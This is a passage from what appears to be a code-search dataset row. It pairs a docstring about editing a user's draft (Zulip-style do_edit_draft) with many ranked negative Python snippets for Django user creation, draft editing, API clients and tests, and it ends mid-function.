title=create_random_string(seed_random(10)),\n text=create_random_string(seed_random(300)),\n slug=create_random_string(seed_random(100)) )", "def create_person(data_dict, m2m_dict):\n email_address = data_dict['email_address']\n # check if the person already exists:\n try:\n exists = Person.objects.get(email_address=email_address)\n create_message = f'Skipping: Person with {email_address} already exists.'\n except:\n # try:\n person_obj, person_created = Person.objects.update_or_create(**data_dict)\n # populate MANY-TO-MANY fields\n if m2m_dict:\n # created_by (FK)\n created_by_email = m2m_dict['created_by']\n user, user_created = User.objects.get_or_create(email=created_by_email)\n person_qs = Person.objects.filter(email_address=person_obj.email_address)\n person_qs.update(created_by=user)\n # expertise (M2M)\n expertise_values = m2m_dict['expertise']\n if expertise_values:\n values_list = [value.strip() for value in expertise_values.split(',')]\n for value in values_list:\n expertise_obj, expertise_created = Expertise.objects.get_or_create(name=value)\n person_obj.expertise.add(expertise_obj)\n # industry (M2M)\n industry_values = m2m_dict['industries']\n if industry_values:\n values_list = [value.strip() for value in industry_values.split(',')]\n for value in values_list:\n industry_obj, industry_created = Industry.objects.get_or_create(name=value)\n person_obj.industries.add(industry_obj)\n # organization (M2M)\n organization_values = m2m_dict['organization']\n if organization_values:\n values_list = [value.strip() for value in organization_values.split(',')]\n for value in values_list:\n organization_obj, organization_created = Organization.objects.get_or_create(name=value)\n person_obj.organization.add(organization_obj)\n # owned by (M2M)\n exportable_by_values = m2m_dict['exportable_by']\n if exportable_by_values:\n values_list = [value.strip() for value in exportable_by_values.split(',')]\n for value in values_list:\n dive_obj, dive_created = Dive.objects.get_or_create(name=value)\n person_obj.exportable_by.add(dive_obj)\n # let us know how it went\n if person_created:\n create_message = f'Success: {person_obj}'\n else:\n create_message = f'Failed: {person_obj}'\n # except Exception as e:\n # create_message = f'Error for {email_address}: {e}\\n'\n print(create_message)\n # except:\n # failed_rows.append(counter)\n # try:\n # obj, created = Person.objects.create(**csv_to_model)\n # except:\n # message = 'Create person' + str(sys.exc_info())\n # print(message)", "def create_user(schools_dictionnary, domains_to_skills_dictionnary, companies, places, skills_oh, places_oh, domains_oh, rng, _id):\n\n age = rng.randint(20,60)\n schools = rng.choice(list(schools_dictionnary.keys()), rng.choice([1, 2], p = [0.95, 0.05]), replace = False) \n\n available_skills = list(set([skill for school in schools \\\n for domain in schools_dictionnary[school].domains \\\n for skill in domains_to_skills_dictionnary[domain]]))\n\n expo = np.round(rng.exponential(0.3) * len(schools)) + age // 17 + 1\n\n nb_skills_to_choose = min(int(expo), 5 + (len(schools) - 1) * 3)\n\n _skills = rng.choice(available_skills, nb_skills_to_choose, replace = False)\n\n company = rng.choice(companies)\n place = rng.choice(places)\n\n user = User(skills_oh, places_oh, domains_oh, schools_dictionnary, skills = _skills, age = age, place = place, company = company,\n schools = schools, _id = _id)\n\n return user", "def create_set_of_fake_data(\n user_count=10,\n post_count_max_per_user=1,\n post_comments_max_per_post=2):\n\n for user in range(user_count):\n new_user = create_user(user_count)\n\n # For this new user, create some posts\n nb_posts = randint(1, post_count_max_per_user)\n for post in range(nb_posts):\n create_post(\n user=new_user,\n post_count_max_per_user=post_count_max_per_user\n )\n\n # For each created user, create some comments\n # Hence, a post may have no comments\n new_users = User.objects.all()\n new_posts = Post.objects.all()\n for user in new_users:\n post = new_posts[randint(0, len(new_posts) - 1)]\n create_comments(\n user=user,\n related_post=post,\n post_comments_max_per_post=post_comments_max_per_post\n )", "def update_draft(self, version, request):\n for metadata in version.revision.easypublishermetadata_set.all():\n if request.user.has_perm(\"easypublisher.can_approve_for_publication\"): \n metadata.status = 'published'\n # save all other drafts for this object as declined, because we\n # chose to save a different one\n for other in EasyPublisherMetaData.objects.filter(\n revision__version__object_id=version.object_id, \n revision__version__content_type=version.content_type):\n other.status = 'declined'\n other.save()\n else:\n metadata.status = 'updated'\n metadata.save()", "def record_create_for_user(project_id, user_id, values):\n values['project_id'] = project_id\n values['user_id'] = user_id\n\n session = get_session()\n with session.begin():\n record_ref = models.UserAccountRecord()\n record_ref.update(values)\n record_ref.save(session=session)", "def post_integrations_action_draft_test(self, action_id, body, **kwargs):\n\n all_params = ['action_id', 'body']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_action_draft_test\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'action_id' is set\n if ('action_id' not in params) or (params['action_id'] is None):\n raise ValueError(\"Missing the required parameter `action_id` when calling `post_integrations_action_draft_test`\")\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_action_draft_test`\")\n\n\n resource_path = '/api/v2/integrations/actions/{actionId}/draft/test'.replace('{format}', 'json')\n path_params = {}\n if 'action_id' in params:\n path_params['actionId'] = params['action_id']\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='TestExecutionResult',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def test_modify(modify_requests):\n # 先创建用户\n admin1 = User(username=\"admin1\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"123456\", is_admin=True, query_json=\"\")\n admin2 = User(username=\"admin2\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"456789\", is_admin=True, query_json=\"\")\n admin3 = User(username=\"admin3\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"456789\", is_admin=True, query_json=\"\")\n user1 = User(username=\"user1\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"123456\", is_admin=False, query_json=\"\")\n user2 = User(username=\"user2\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n password=\"0987654\", is_admin=False, query_json=\"\")\n # user3 = User(username=\"user3\", email=\"CodeDance@mails.tsinghua.edu.cn\",\n # password=\"qwerty\", is_admin=False, query_json=\"\")\n\n for user in [admin1, admin2, admin3, user1, user2]:\n user.full_clean()\n user.save()\n # 再创建文档\n document_exist_1 = Document(id=1, content=\"高温超导(High-temperature superconductivity,High Tc)\\\n 是一种物理现象,指一些具有较其他超导物质相对较高的临界温度的物质在液态氮的环境下产生的超导现象。\",\n status=0, title=\"超导现象\", src=0)\n document_exist_2 = Document(id=2, content=\"2020年新西兰大选(英语:2020 New Zealand general election),\\\n 即第53届新西兰国会选举于该年10月17日举行[1]。本届选举为新西兰自1996年采用混合议员比例代表制(联立单一选区两票制)\\\n 以来的第八次选举。此次大选与有关大麻和安乐死合法化的两个公投一并进行。结果工党取得过半数议席,有权单独执政,\\\n 为现有选举制度开始实施至今的首次。[2]\", status=0, title=\"新西兰大选\", src=0)\n document_exist_3 = Document(id=3, content=\"永州之野产异蛇,黑质而白章,触草木尽死。以啮人,无御之者。然得而腊之以为饵,\\\n 可以已大风、挛、瘘、疠,去死肌,杀三虫。其始,太医以王命聚之,岁赋其二,募有能捕之者,当其租入,永之人争奔走焉。\\\n 有蒋氏者,专其利三世矣。问之,则曰:“吾祖死于是,吾父死于是,今吾嗣为之十二年,几死者数矣。”言之,貌若甚戚者。\\\n 余〈杰按:通“予”,下同。〉悲之,且曰:“若毒之乎?余将告于莅是者,更若役,复若赋,则何如?”蒋氏大戚,\\\n 汪然出涕曰:“君将哀而生之乎?则吾斯役之不幸,未若复吾赋不幸之甚也。向吾不为斯役,则久已病矣。\\\n 自吾氏三世居是乡,积于今六十岁矣,而乡邻之生日蹙。殚其地之出,竭其庐之入,号呼而转徙,饥渴而顿踣,\\\n 触风雨,犯寒暑,呼嘘毒疠,往往而死者相藉也。曩与吾祖居者,今其室十无一焉;与吾父居者,今其室十无二三焉;\\\n 与吾居十二年者,今其室十无四五焉,非死即徙尔。而吾以捕蛇独存。悍吏之吾乡,叫嚣乎东西,隳突乎南北,哗然而骇者,虽鸡狗不得宁焉。\\\n 吾恂恂而起,视其缶,而吾蛇尚存,则弛然而卧。谨食之,时而献焉。退而甘食其土之有,以尽吾齿。盖一岁之犯死者二焉,其馀则熙熙而乐,\\\n 岂若吾乡邻之旦旦有是哉!今虽死乎此,比吾乡邻之则已后矣,又安敢毒耶?”余闻而愈悲。孔子曰:“苛政猛于虎也。”吾尝疑乎是,今以蒋氏观之,\\\n 犹信。呜呼!孰知赋敛之毒,有甚是蛇者乎!故为之说,以俟夫观人风者得焉。\", status=0, title=\"捕蛇者说\", src=0)\n document_deleted_4 = Document(id=4, content=\"采薇采薇,薇亦作止。曰归曰归,岁亦莫止。靡室靡家,玁狁之故。不遑启居,玁狁之故。\\\n 采薇采薇,薇亦柔止。曰归曰归,心亦忧止。忧心烈烈,载饥载渴。我戍未定,靡使归聘。\\\n 采薇采薇,薇亦刚止。曰归曰归,岁亦阳止。王事靡盬,不遑启处。忧心孔疚,我行不来!\\\n 彼尔维何?维常之华。彼路斯何?君子之车。戎车既驾,四牡业业。岂敢定居?一月三捷。\\\n 驾彼四牡,四牡骙骙。君子所依,小人所腓。四牡翼翼,象弭鱼服。岂不日戒?玁狁孔棘!\\\n 昔我往矣,杨柳依依。今我来思,雨雪霏霏。行道迟迟,载渴载饥。我心伤悲,莫知我哀!\", status=1, title=\"采薇\", src=0)\n document_deleted_5 = Document(id=5, content=\"氓之蚩蚩,抱布贸丝。匪来贸丝,来即我谋。\\\n 送子涉淇,至于顿丘。匪我愆期,子无良媒。将子无怒,秋以为期。\\\n  乘彼垝垣,以望复关。不见复关,泣涕涟涟。既见复关,载笑载言。尔卜尔筮,体无咎言。以尔车来,以我贿迁。\\\n  桑之未落,其叶沃若。于嗟鸠兮,无食桑葚!于嗟女兮,无与士耽!士之耽兮,犹可说也。女之耽兮,不可说也。\\\n  桑之落矣,其黄而陨。自我徂尔,三岁食贫。淇水汤汤,渐车帷裳。女也不爽,士贰其行。士也罔极,二三其德。\\\n  三岁为妇,靡室劳矣;夙兴夜寐,靡有朝矣。言既遂矣,至于暴矣。兄弟不知,咥其笑矣。静言思之,躬自悼矣。\\\n  及尔偕老,老使我怨。淇则有岸,隰则有泮。总角之宴,言笑晏晏。信誓旦旦,不思其反。反是不思,亦已焉哉!\", status=1, title=\"氓\", src=0)\n\n for document in [document_exist_1, document_exist_2, document_exist_3,\n document_deleted_4, document_deleted_5]:\n document.full_clean()\n document.save()\n\n for request in modify_requests:\n response = modify(request[\"request\"])\n assert response.status_code == request[\"response\"][\"code\"]\n # assert json.loads(response.content)[\"data\"].startswith(request[\"response\"][\"data\"])", "def Board_create(objPoints, dictionary, ids):\n pass", "def post_integrations_action_draft_publish(self, action_id, body, **kwargs):\n\n all_params = ['action_id', 'body']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method post_integrations_action_draft_publish\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'action_id' is set\n if ('action_id' not in params) or (params['action_id'] is None):\n raise ValueError(\"Missing the required parameter `action_id` when calling `post_integrations_action_draft_publish`\")\n # verify the required parameter 'body' is set\n if ('body' not in params) or (params['body'] is None):\n raise ValueError(\"Missing the required parameter `body` when calling `post_integrations_action_draft_publish`\")\n\n\n resource_path = '/api/v2/integrations/actions/{actionId}/draft/publish'.replace('{format}', 'json')\n path_params = {}\n if 'action_id' in params:\n path_params['actionId'] = params['action_id']\n\n query_params = {}\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n if 'body' in params:\n body_params = params['body']\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'POST',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='Action',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response", "def setUp(self) -> None:\n super().setUp()\n\n user_models.UserBulkEmailsModel(id=self.USER_ID_1).put()\n user_models.UserBulkEmailsModel(id=self.USER_ID_2, deleted=True).put()", "def test_create_user_wrong_type(self):\n\n data = {\n \"firstname\": \"John\",\n \"lastname\": \"Doe\",\n \"password\": \"supersecret\",\n \"password_repeat\": \"supersecret\",\n }\n\n for item in [\"firstname\", \"lastname\", \"password\", \"password_repeat\"]:\n data_copy = copy(data)\n data_copy[item] = 1234\n res = self.post(url=\"/users\", data=data_copy)\n self.assertException(res, exc.WrongType)\n\n users = User.query.all()\n self.assertEqual(len(users), 5)", "def test_collective_users_submits(self):\r\n\r\n # 1.\r\n users_state = self._get_users_state()\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state.items()\r\n ])),\r\n 'success')\r\n\r\n # 2.\r\n # Invcemental state per user.\r\n users_state_after_post = self._post_words(['word1', 'word2'])\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state_after_post.items()\r\n ])),\r\n 'success')\r\n\r\n # Final state after all posts.\r\n users_state_before_fail = self._get_users_state()\r\n\r\n # 3.\r\n users_state_after_post = self._post_words(\r\n ['word1', 'word2', 'word3'])\r\n\r\n self.assertEqual(\r\n ''.join(set([\r\n content['status']\r\n for _, content in users_state_after_post.items()\r\n ])),\r\n 'fail')\r\n\r\n # 4.\r\n current_users_state = self._get_users_state()\r\n self._check_response(users_state_before_fail, current_users_state)", "def user_batch():\n return [\n UserFactory(roles=RoleFactory.create_batch(randint(0, 3)))\n for _ in range(randint(3, 5))\n ]", "def __createFields(self):\n fields = self.updateFields\n for field in fields:\n self.__createField(field)", "def batch_transfer(self):\n ticket_range = self.zendesk.ticket_range()\n for i in range(1, ticket_range):\n tickets = self.zendesk.get_list_of_tickets(i)\n for ticket in tickets[\"tickets\"]:\n ticket_id = ticket[\"id\"]\n self.transfer_ticket(ticket_id)", "def seed_all():\n seed_client()\n seed_staff()\n seed_request()\n seed_comment()", "def create_user_batch(self, email, first_name, last_name,\n pms=False, tms=False, rvs=False,\n welcome_email=False):\n user = self.create_user(\n email=email,\n password=self.make_random_password(),\n first_name=first_name,\n last_name=last_name)\n\n if pms:\n user.assessment_pms.add(*pms)\n\n if tms:\n user.assessment_teams.add(*tms)\n\n if rvs:\n user.assessment_reviewers.add(*rvs)\n\n if welcome_email:\n user.send_welcome_email()", "def create(self, data):\n data.pop('password_confirmation')\n try:\n availability = data.pop(\"availability\")\n babysitter = data.pop(\"user_bbs\")\n user = User.objects.create_user(**data, is_verified=False)\n if babysitter:\n bbs = Babysitter.objects.create(user_bbs=user, **babysitter)\n for shift in availability:\n Availability.objects.create(bbs=bbs, **shift)\n except KeyError:\n logging.info('This is a instance client')\n user = User.objects.create_user(**data, is_verified=False)\n logging.info(f'User created, whit pk {user.pk}')\n client = Client.objects.create(user_client=user)\n logging.info(f'User pk is already to pass {user.pk}')\n send_confirmation_email.delay(username=user.username, email=user.email )\n return user", "def _post_draft_message(request, draft):\n if draft is None:\n draft = models.Message(\n issue_key=request.issue.key, parent=request.issue.key,\n sender=request.user.email(), draft=True)\n draft.text = request.POST.get('reviewmsg')\n draft.put()\n return HttpTextResponse(draft.text)", "def get_integrations_actions_drafts(self, **kwargs):\n\n all_params = ['page_size', 'page_number', 'next_page', 'previous_page', 'sort_by', 'sort_order', 'category', 'name', 'secure', 'include_auth_actions']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_integrations_actions_drafts\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n\n resource_path = '/api/v2/integrations/actions/drafts'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'page_size' in params:\n query_params['pageSize'] = params['page_size']\n if 'page_number' in params:\n query_params['pageNumber'] = params['page_number']\n if 'next_page' in params:\n query_params['nextPage'] = params['next_page']\n if 'previous_page' in params:\n query_params['previousPage'] = params['previous_page']\n if 'sort_by' in params:\n query_params['sortBy'] = params['sort_by']\n if 'sort_order' in params:\n query_params['sortOrder'] = params['sort_order']\n if 'category' in params:\n query_params['category'] = params['category']\n if 'name' in params:\n query_params['name'] = params['name']\n if 'secure' in params:\n query_params['secure'] = params['secure']\n if 'include_auth_actions' in params:\n query_params['includeAuthActions'] = params['include_auth_actions']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['PureCloud OAuth']\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='ActionEntityListing',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response" ]
[ "0.56473714", "0.55276287", "0.5469983", "0.5152256", "0.5134393", "0.5032918", "0.4999463", "0.49490035", "0.49176887", "0.49063164", "0.48992178", "0.48911917", "0.48814285", "0.48810473", "0.48643064", "0.48627475", "0.48573655", "0.48487023", "0.48398086", "0.48395732", "0.47892275", "0.47678792", "0.47663376", "0.47654828", "0.47591096", "0.47496137", "0.47379512", "0.4734019", "0.47167554", "0.470971", "0.4699241", "0.46818334", "0.46818247", "0.46738422", "0.46677288", "0.46614414", "0.46570012", "0.46464014", "0.46352196", "0.46109182", "0.46088654", "0.46063933", "0.4587543", "0.45742354", "0.45688087", "0.45681214", "0.4550345", "0.45463353", "0.45437443", "0.453122", "0.45309478", "0.4528985", "0.45206273", "0.45179492", "0.4506122", "0.4481116", "0.4461353", "0.44601384", "0.44594777", "0.44545907", "0.44354975", "0.44296935", "0.44274187", "0.4425626", "0.4414628", "0.44111487", "0.44101024", "0.44027638", "0.44003233", "0.4395836", "0.43931785", "0.43901214", "0.43753543", "0.43724817", "0.43628758", "0.4358713", "0.43575794", "0.43393183", "0.43276587", "0.43267816", "0.43261", "0.4318033", "0.43171448", "0.43159336", "0.43156177", "0.431395", "0.43131655", "0.43101948", "0.4309236", "0.430473", "0.430186", "0.42951035", "0.42924568", "0.42898947", "0.4285889", "0.42856336", "0.42845896", "0.42792395", "0.42759982", "0.42748168" ]
0.7956114
0
Edit/update a single draft for a given user. Since the only place this method is being used from (apart from tests) is the edit_draft view, we assume that the drafts_dict is syntactically valid (i.e. it satisfies the draft_dict_validator).
def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None: try: draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile) except Draft.DoesNotExist: raise ResourceNotFoundError(_("Draft does not exist")) valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile) draft_object.content = valid_draft_dict["content"] draft_object.topic = valid_draft_dict["topic"] draft_object.recipient_id = valid_draft_dict["recipient_id"] draft_object.last_edit_time = valid_draft_dict["last_edit_time"] draft_object.save() event = {"type": "drafts", "op": "update", "draft": draft_object.to_dict()} send_event(user_profile.realm, event, [user_profile.id])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edit_draft(self):\r\n EmptyPromise(\r\n lambda: self.q(css='.create-draft').present,\r\n 'Wait for edit draft link to be present'\r\n ).fulfill()\r\n\r\n self.q(css='.create-draft').first.click()\r\n\r\n EmptyPromise(\r\n lambda: self.q(css='.editing-draft-alert').present,\r\n 'Wait for draft mode to be activated'\r\n ).fulfill()", "def edit_user(user_id):\n\n db_user = User.query.get_or_404(user_id)\n\n return render_template(\"edit_user.html\",\n headline=f\"Edit Blogly {db_user.get_full_name()}\",\n user=db_user)", "def edit(user_id):\n if user_id != current_user.id:\n return abort(403)\n\n user = get_user(user_id)\n form = EditForm(obj=user)\n form.email.data = user.email\n\n if form.validate_on_submit():\n password = form.password.data\n username = form.username.data\n\n save_result = edit_user(user_id, password, username, user.active)\n user = save_result['entry']\n form = EditForm(request.form, obj=save_result['entry'])\n form.email.data = user.email\n return redirect(url_for('.index'))\n \n return render_template('users/edit.html'\n ,form=form\n ,user=user\n ,t=t\n ,m=m)", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n return render_template('/users/edit_page.html', user=user)", "def edit_user(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('users/edit.html', user=user)", "def put(self, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n self.validate_input(d, draft_id)\n self.process_input(d, draft_id)\n d.save()", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n\n return render_template('edit-user.html', user=user)", "def update(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('update',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def further_validated_draft_dict(\n draft_dict: Dict[str, Any], user_profile: UserProfile\n) -> Dict[str, Any]:\n\n content = normalize_body(draft_dict[\"content\"])\n\n timestamp = draft_dict.get(\"timestamp\", time.time())\n timestamp = round(timestamp, 6)\n if timestamp < 0:\n # While it's not exactly an invalid timestamp, it's not something\n # we want to allow either.\n raise JsonableError(_(\"Timestamp must not be negative.\"))\n last_edit_time = timestamp_to_datetime(timestamp)\n\n topic = \"\"\n recipient_id = None\n to = draft_dict[\"to\"]\n if draft_dict[\"type\"] == \"stream\":\n topic = truncate_topic(draft_dict[\"topic\"])\n if \"\\0\" in topic:\n raise JsonableError(_(\"Topic must not contain null bytes\"))\n if len(to) != 1:\n raise JsonableError(_(\"Must specify exactly 1 stream ID for stream messages\"))\n stream, sub = access_stream_by_id(user_profile, to[0])\n recipient_id = stream.recipient_id\n elif draft_dict[\"type\"] == \"private\" and len(to) != 0:\n to_users = get_user_profiles_by_ids(set(to), user_profile.realm)\n try:\n recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id\n except ValidationError as e: # nocoverage\n raise JsonableError(e.messages[0])\n\n return {\n \"recipient_id\": recipient_id,\n \"topic\": topic,\n \"content\": content,\n \"last_edit_time\": last_edit_time,\n }", "def edit_draft(self, message_id):\n return Draft(self, message_id).fetch()", "def show_edit_form(user_id):\n user = User.query.get_or_404(user_id)\n return render_template('edit.html', user=user)", "def edit_user(user_id):\n user = User.query.get_or_404(user_id)\n return render_template(\"users/edit_user.html\", user=user)", "def show_edit_form(user_id):\n\n user = User.query.get_or_404(user_id)\n\n return render_template(\"users/edit_user.html\", user=user)", "def put(self, user_id):\r\n return update_user(request, user_id)", "def test_update_draft():\n with open(basedir + \"fixture/7149593_formatted.json\", \"r\") as f:\n data = f.read()\n storage.save_draft(user_id, \"bib\", \"7149593\", data, \"1362044230872\")\n json_data = json.loads(data)\n json_data['@context'] = \"yadda\"\n storage.update_draft(user_id, \"bib\", \"7149593\", json.dumps(json_data), \"1362044230872\")\n assert json.loads(open(basedir + \"some/path/\" + user_id + \"/bib/7149593\", \"r\").read())['document']['@context'] == \"yadda\"", "def allow_to_edit(user):\n return allow_to_edit_well(user)", "def show_edit_user_form(user_id):\n\n user = User.query.get_or_404(user_id)\n return render_template('edit_user.html', user=user)", "def update( self, trans, id, payload, **kwd ):\n current_user = trans.user\n user_to_update = self.user_manager.by_id( self.decode_id( id ) )\n\n # only allow updating other users if they're admin\n editing_someone_else = current_user != user_to_update\n is_admin = trans.api_inherit_admin or self.user_manager.is_admin( current_user )\n if editing_someone_else and not is_admin:\n raise exceptions.InsufficientPermissionsException( 'you are not allowed to update that user', id=id )\n\n self.user_deserializer.deserialize( user_to_update, payload, user=current_user, trans=trans )\n return self.user_serializer.serialize_to_view( user_to_update, view='detailed' )", "def show_edit_user_form(user_id):\r\n user = User.query.get_or_404(user_id)\r\n\r\n return render_template('edit-user.html', user=user)", "def patch(self,\n draft_id,\n policy_draft,\n ):\n return self._invoke('patch',\n {\n 'draft_id': draft_id,\n 'policy_draft': policy_draft,\n })", "def get_draft_by_id(request, draft_id):\n\n for draft in request.session[\"drafts\"]:\n if draft[\"id\"] == draft_id:\n # Found a valid draft, return it\n return draft\n\n return None # Otherwise return None.", "def put(self, user_id):\n data = request.json\n return update_user(data, user_id)", "def edit_post(post_id):\n\n post_data = {\"id\": post_id}\n db_post = Post.query.get_or_404(post_id)\n post_data[\"title\"] = db_post.title\n post_data[\"content\"] = db_post.content\n post_data[\"user_id\"] = db_post.user_id\n\n return render_template(\"edit_post.html\", headline=\"Add New Blogly User\", post=post_data)", "def can_edit(self, user, user_is_admin=False):\r\n if user is None or isinstance(user, FakeAccount):\r\n return False\r\n elif user_is_admin or self.author_id == user._id:\r\n return True\r\n elif Subreddit._by_name('discussion').is_editor(user):\r\n return True\r\n else:\r\n return False", "def edit_user_process(user_id):\n\n # extract form data, edit, commit, then redirect to /users\n first_name = request.form[\"first-name\"].strip()\n last_name = request.form[\"last-name\"].strip()\n image_url = request.form[\"image-url\"].strip()\n\n msg = db_edit_user(user_id, first_name, last_name, image_url)\n\n flash(msg[\"text\"], msg[\"severity\"])\n\n return redirect(f\"/users/{user_id}\")", "def update(self, user: U) -> None:\n ...", "def commit_draft(draft_uuid):\n api_request('post', api_url('drafts', str(draft_uuid), 'commit'))", "def user_edit(request):\n DEBUG = False\n\n if not has_permission('editUser', request.context, request):\n #print \"NOT has_permission !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\"\n request.message = \"You do not have permissions to edit this user!\"\n raise HTTPForbidden\n\n # if no user_id in URL and not logged in, tell user to login\n\n try:\n user_id = request.matchdict['user_id']\n except KeyError, ke:\n #print ke\n return HTTPFound(location=request.route_url('not_found'))\n\n user = User.get_by_user_id(user_id)\n\n if user is None:\n msg = \"User was not founf in database.\"\n return HTTPFound(location=request.route_url('not_found'))\n\n form = Form(request, schema=UserSettingsSchema, obj=user)\n\n if 'form.submitted' in request.POST and not form.validate():\n # form didn't validate\n request.session.flash('Please check the form below for errors!')\n if DEBUG: # pragma: no cover\n print \"submitted but not validated!\"\n\n if 'form.submitted' in request.POST and form.validate():\n # ready for changing database entries!\n request.session.flash('form validated!')\n if DEBUG: # pragma: no cover\n print \"the form was submitted and validated.\"\n\n if form.data['surname'] != user.surname:\n if DEBUG: # pragma: no cover\n request.session.flash('surname was not same --> changing')\n print \"changing surname\"\n user.surname = form.data['surname']\n if form.data['lastname'] != user.lastname:\n if DEBUG: # pragma: no cover\n request.session.flash('lastname was not same --> changing')\n print \"changing lastname\"\n user.lastname = form.data['lastname']\n if form.data['email'] != user.email:\n request.session.flash('email was not same --> changing')\n user.email = form.data['email']\n if form.data['phone'] != user.phone:\n request.session.flash('phone was not same --> changing')\n user.phone = form.data['phone']\n if form.data['fax'] != user.fax:\n request.session.flash('fax was not same --> changing')\n user.fax = form.data['fax']\n if form.data['street'] != user.street:\n request.session.flash('street was not same --> changing')\n user.street = form.data['street']\n if form.data['number'] != user.number:\n request.session.flash('number was not same --> changing')\n user.number = form.data['number']\n if form.data['city'] != user.city:\n request.session.flash('city was not same --> changing')\n user.city = form.data['city']\n if form.data['postcode'] != user.postcode:\n request.session.flash('postcode was not same --> changing')\n user.postcode = form.data['postcode']\n if form.data['country'] != user.country:\n request.session.flash('country was not same --> changing')\n user.country = form.data['country']\n\n if DEBUG: # pragma: no cover\n print \"returning the form\"\n return {\n 'the_user_id': user_id,\n 'the_username': user.username,\n 'form': FormRenderer(form),\n }", "def edit(ctx, docid, password):\n coll = db.get_document_collection(ctx)\n config = ctx.obj[\"config\"]\n\n doc, docid = db.get_document_by_id(ctx, docid)\n title = doc[\"title\"]\n\n template, c = db.get_content(ctx, doc, password=password)\n\n content, tmpfile = utils.get_content_from_editor(config[\"editor\"], template=template)\n d = datetime.datetime.now()\n\n if doc[\"encrypted\"] is True:\n title = utils.get_title_from_content(content)\n content = c.encrypt_content(content.decode(\"utf-8\").encode(\"utf-8\"))\n else:\n if not \"links\" in doc[\"categories\"]:\n title = utils.get_title_from_content(content)\n\n if isinstance(template, unicode):\n content = content.decode(\"utf-8\")\n\n if content != template:\n doc[\"content\"] = content\n doc[\"title\"] = title\n doc[\"updated\"] = d\n if validate(doc):\n coll.save(doc)\n else:\n utils.log_error(\"Validation of the updated object did not succeed\")\n\n transaction.log(ctx, docid, \"edit\", title)\n utils.log_info(\"Document \\\"%s\\\" updated.\" % title)\n else:\n utils.log_info(\"No changes detected for \\\"%s\\\"\" % title)\n\n utils.clean_tmpfile(tmpfile)\n\n return True", "def update(id):\n if request.method == \"POST\":\n result = update_post(\n id,\n request.form[\"title\"],\n request.form[\"body\"]\n )\n flash(result)\n return redirect(url_for(\"show\"))\n else:\n post = get_post(id)\n return render_template(\"edit.html\", **post)", "def edit(request, pk):\n\n try:\n object = User.objects.get(pk=pk)\n except:\n object = User()\n\n if request.method == 'POST': # If the form has been submitted...\n form = UserForm(request.POST, instance=object)\n\n if form.is_valid(): # If the form is valid\n object = form.save()\n\n messages.success(request, _('The user has been saved.'))\n\n return redirect('users.views.list')\n else:\n form = UserForm(instance=object)\n\n return render(request, 'users/users/edit.html', {'form': form})", "def edit_user(user_id):\n\n if not g.user:\n flash(\"Access denied.\", \"danger\")\n\n 